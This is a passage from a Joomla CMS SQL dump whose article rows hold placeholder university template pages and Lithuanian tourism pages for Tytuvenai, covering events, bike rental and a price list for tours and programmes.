"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(24,63,'College of Engineering','college-of-engineering','','<p>Adipisicing elit, sed do eiusmod tempor incidi dunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. Quis nostrud exercitation ullamco.laboris nisi ut aliquip ex ea commodo consequat.</p>\r\n','\r\n<p> </p>',-2,0,0,12,'2013-09-23 10:34:25',135,'','2013-10-08 10:21:50',135,0,'0000-00-00 00:00:00','2013-09-23 10:34:25','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/featured\\/feature5.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/university\\/featured\\/feature5.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,3,'','',1,575,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(25,64,'College of Fine Arts','college-of-fine-arts','','<p>Adipisicing elit, sed do eiusmod tempor incidi dunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. Quis nostrud exercitation ullamco.laboris nisi ut aliquip ex ea commodo consequat.</p>\r\n','\r\n<p> </p>',-2,0,0,12,'2013-09-23 10:35:16',135,'','2013-10-08 10:19:56',135,0,'0000-00-00 00:00:00','2013-09-23 10:35:16','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/featured\\/feature2.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/university\\/featured\\/feature2.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,2,'','',1,2201,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(26,65,'College of General Studies','college-of-general-studies','','<p>Adipisicing elit, sed do eiusmod tempor incidi dunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. Quis nostrud exercitation ullamco.laboris nisi ut aliquip ex ea commodo consequat.</p>\r\n','\r\n<p> </p>',-2,0,0,12,'2013-09-23 10:36:04',135,'','2013-10-08 10:21:13',135,0,'0000-00-00 00:00:00','2013-09-23 10:36:04','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/featured\\/feature4.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/university\\/featured\\/feature4.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,1,'','',1,596,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(27,66,'College of Health & Rehabilitation Sciences','college-of-health-rehabilitation-sciences-sargent-college','','<p>Adipisicing elit, sed do eiusmod tempor incidi dunt ut labore et dolore magna aliqua. Ut enim ad minim veniam. Quis nostrud exercitation ullamco.laboris nisi ut aliquip ex ea commodo consequat.</p>\r\n','\r\n<p> </p>',-2,0,0,12,'2013-09-23 10:36:54',135,'','2013-10-08 10:19:05',135,0,'0000-00-00 00:00:00','2013-09-23 10:36:54','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/featured\\/feature1.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/university\\/featured\\/feature1.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,0,0,'','',1,550,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(28,70,'Pages','pages','','<p>Shaper Helix – II is the default/blank template of Helix Framework version 2. This template has all the in built functionality of Helix 2.0.</p>','',-2,0,0,10,'2013-09-24 09:04:30',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2013-09-24 09:04:30','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,3,'','',1,186,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(29,71,'About Us','about-us','','<div class=\"about-us\">\r\n<p>[row] [col class=\"span12\"]</p>\r\n<h4>Our Mission</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.</p>\r\n<p> </p>\r\n<h4>Our History</h4>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.</p>\r\n<p> </p>\r\n<h4>People</h4>\r\n<p class=\"about-comittee\">Executive Committee</p>\r\n<p>[/col][/row]</p>\r\n<p class=\"about-designation\">President</p>\r\n<p>[row] [col class=\"span4 team-photo\" ] <img class=\"about-img\" src=\"images/university/about_us/president1.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p class=\"about-name\">James P. Gerkis</p>\r\n<p>[/col] [col class=\"span4 team-photo\"] <img class=\"about-img\" src=\"images/university/about_us/president2.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p class=\"about-name\">James P. Gerkis</p>\r\n<p>[/col] [col class=\"span4 team-photo\"] <img class=\"about-img\" src=\"images/university/about_us/president3.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p class=\"about-name\">James P. Gerkis</p>\r\n<p>[/col] [/row]</p>\r\n<p class=\"about-designation\">Vice President</p>\r\n<p>[row] [col class=\"span4 team-photo\"] <img class=\"about-img\" src=\"images/university/about_us/vice_president1.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p class=\"about-name\">James P. Gerkis</p>\r\n<p>[/col] [col class=\"span4 team-photo\"] <img class=\"about-img\" src=\"images/university/about_us/vice_president2.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p class=\"about-name\">David Evans</p>\r\n<p>[/col] [col class=\"span4 team-photo\"] <img class=\"about-img\" src=\"images/university/about_us/vice_president3.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p class=\"about-name\">David F. Gibson</p>\r\n<p>[/col] [/row]</p>\r\n<p class=\"about-comittee\">Board Member</p>\r\n<p> </p>\r\n<p>[row] [col class=\"span4 team-photo\"] <img class=\"about-img\" src=\"images/university/about_us/board_member1.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p class=\"about-name\">James P. Gerkis</p>\r\n<p>[/col] [col class=\"span4 team-photo\"] <img class=\"about-img\" src=\"images/university/about_us/board_member2.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p class=\"about-name\">David Evans</p>\r\n<p>[/col] [col class=\"span4 team-photo\"] <img class=\"about-img\" src=\"images/university/about_us/board_member3.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p class=\"about-name\">David F. Gibson</p>\r\n<p>[/col] [/row] [row] [col class=\"span4 team-photo\"] <img class=\"about-img\" src=\"images/university/about_us/board_member4.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p class=\"about-name\">James P. Gerkis</p>\r\n<p>[/col] [col class=\"span4 team-photo\"] <img class=\"about-img\" src=\"images/university/about_us/board_member5.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p class=\"about-name\">David Evans</p>\r\n<p>[/col] [col class=\"span4 team-photo\"] <img class=\"about-img\" src=\"images/university/about_us/borad_member6.jpg\" border=\"0\" alt=\"\" /></p>\r\n<p class=\"about-name\">David F. Gibson</p>\r\n<p>[/col] [/row]</p>\r\n</div>','',-2,0,0,10,'2013-09-24 09:10:43',135,'','2013-10-08 10:15:12',135,0,'0000-00-00 00:00:00','2013-09-24 09:10:43','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',61,0,2,'','',1,499,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(30,72,'Contact Us','contact-us','','<p>[spmap lat=\"23.743193\" lng=\"90.388281\" zoom=\"12\" height=\"400\" maptype=\"ROADMAP\"]</p>\r\n<p> </p>\r\n<h4>Address</h4>\r\n<p>University, 24 Bela Road West, Lorem ipsum, London</p>\r\n<p><strong>Phone</strong>: 012 3456 789, <strong>Fax</strong> : 234 23423, <strong>Email</strong>: info@university.com</p>\r\n<p> </p>\r\n<h4>Directions &amp; Hours</h4>\r\n<p>The <strong>UNIVERSITY</strong> is located at 15 West 43rd Street, between Fifth Avenue and the Avenue of the Americas (Sixth Avenue).</p>\r\n<p><strong><span style=\"line-height: 1.3em;\">Hours of Operation</span></strong></p>\r\n<p>Seven days a week, 7:00 AM to 11:00 PM</p>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum at 11:00pm.</p>\r\n<p> </p>\r\n<h4>By Car</h4>\r\n<p>If you are driving north on Sixth Avenue, turn right on 44th Street, right on Fifth Avenue, and right on 43rd Street. The <strong>UNIVERSITY</strong> is on the right.</p>\r\n<p>If you are driving south on Fifth Avenue, turn right on 43rd Street. The <strong>UNIVERSITY</strong> is on the right.</p>\r\n<p> </p>\r\n<h4>Parking</h4>\r\n<p>Special discount rates are available at the ABC Parking garage located across the street from the University at the Grace Building (enter at 38 West 43rd Street between 5th and 6th Avenues)</p>\r\n<p> </p>\r\n<p><strong>Available Options</strong></p>\r\n<p>$12.00 valid for any 12 hours after 5:30pm</p>\r\n<p>$15.00 valid for any 12 hours anytime</p>\r\n<p>$30.00 valid for any 24 hours anytime</p>\r\n<p>Prices are inclusive of 8.875% tax. Student and guests MUST have their parking claim check validated at the University Front Desk in order to receive discount. Over-sized vehicles are subject to an additional fee of $15. There are no in and out privileges.</p>\r\n<p> </p>\r\n<h4>By Bus</h4>\r\n<p>The A1, A2, A3 and A104 all stop near the University. For bus and subway maps and schedules, visit the AMT’s web site.</p>','',-2,0,0,10,'2013-09-24 11:27:43',135,'','2013-09-26 10:46:57',135,0,'0000-00-00 00:00:00','2013-09-24 11:27:43','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_vote\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',17,0,1,'','',1,211,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(31,74,'Renginių kalendorius','renginiai','','<p>Pas mus tikrai nenuobodu, renginius aplankyk ir tu!</p>\r\n','\r\n<p>{googlecalendar}</p>',1,0,0,13,'2013-09-24 11:55:22',135,'','2014-04-27 09:32:02',135,0,'0000-00-00 00:00:00','2013-09-24 11:55:22','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/features\\/featurecal.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"Skaityti daugiau\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',10,0,0,'','',1,7029,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(32,75,'Dviračiai Tytuvėnuose','dviraciai','','<p style=\"text-align: justify;\">Vasaros sezonas artėja, saulės spinduliai vis stipriau braunasi pro ūkanotus šalto pavasario debesis. Kiekvieną dieną norime praleisti gamtoje: pasivaikščioti, pabėgioti, pasivažinėti dviračiais. Siūlome pasinaudoti aktyvaus poilsio paslaugomis Tytuvėnuose, pasivažinėti dviračiais, pasigrožėti bundančia gamta, vasarą išmėginti vandens malonumus.</p>\r\n<p style=\"text-align: justify;\"> </p>','',1,0,0,31,'2013-09-24 11:55:22',135,'','2021-08-03 19:50:49',135,135,'2021-08-03 19:50:49','2013-09-24 11:55:22','0000-00-00 00:00:00','{\"image_intro\":\"images\\/university\\/features\\/featurebike1.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',33,0,6,'','',1,10787,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(33,76,'Paslaugų įkainiai','kava','','<p style=\"text-align: left;\" align=\"center\"> </p>\r\n<table style=\"width: 100%;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\"><strong>Eil. Nr.</strong></p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p align=\"center\"><strong>Paslaugos pavadinimas</strong></p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\"><strong>Mato vnt.</strong></p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\"><strong>Kaina (</strong><strong>€)</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">1.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Bilieto kaina <em>(suaugusiam žmogui)</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">5,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">2.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Bilieto kaina <em>(vaikams, senjorams, neįgaliems)</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">3,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">3.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Gido paslaugos (lietuvių kalba) iki 10 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 vnt.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">20,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">4.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Gido paslaugos (lietuvių kalba) iki 11 asm. ir daugiau</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 vnt.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">30,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">5.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Gido paslaugos (užsienio kalba)</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 vnt.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">40,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">6.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Gido paslaugos po rajoną</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 vnt.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">50,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">7.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Bilieto kaina po Tytuvėnų miestą <em>(suaugusiam, vaikams, senjorams, neįgaliems)</em></p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 vnt.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">6,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">8.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Naktinė ekskursija (sezonas 2024 10 – 202 04)</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">10,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">9.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Dviračių nuoma</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">24 val.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">12,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">10.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Dviračių nuoma</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">8 val.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">9,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">11.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Dviračių nuoma</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">3 val.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">6,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">12.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Dviračių nuoma</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 val.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">3,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">13.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Edukacinė programa „Trys Dievo dovanos ir kiti kvapai“</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">5,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">14.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Edukacinė programa „Trys Dievo dovanos ir kiti kvapai“ su sūrio degustacija ir arbata</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">7,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">15.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Edukacinė programa „Mažas šulinėlis, juodas vandenėlis...“</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">4,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">16.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Edukacinė programa „Su maldos vėriniu per pasaulį“</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">4,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">17.</p>\r\n</td>\r\n<td valign=\"top\" width=\"319\">\r\n<p>Edukacinė programa ,,Vienuolių pietūs‘‘</p>\r\n</td>\r\n<td valign=\"top\" width=\"96\">\r\n<p align=\"center\">1 asm.</p>\r\n</td>\r\n<td valign=\"top\" width=\"85\">\r\n<p align=\"center\">10,00 eur</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"top\" width=\"38\">\r\n<p align=\"center\">18.</p>\r\n</td>\r\n<td 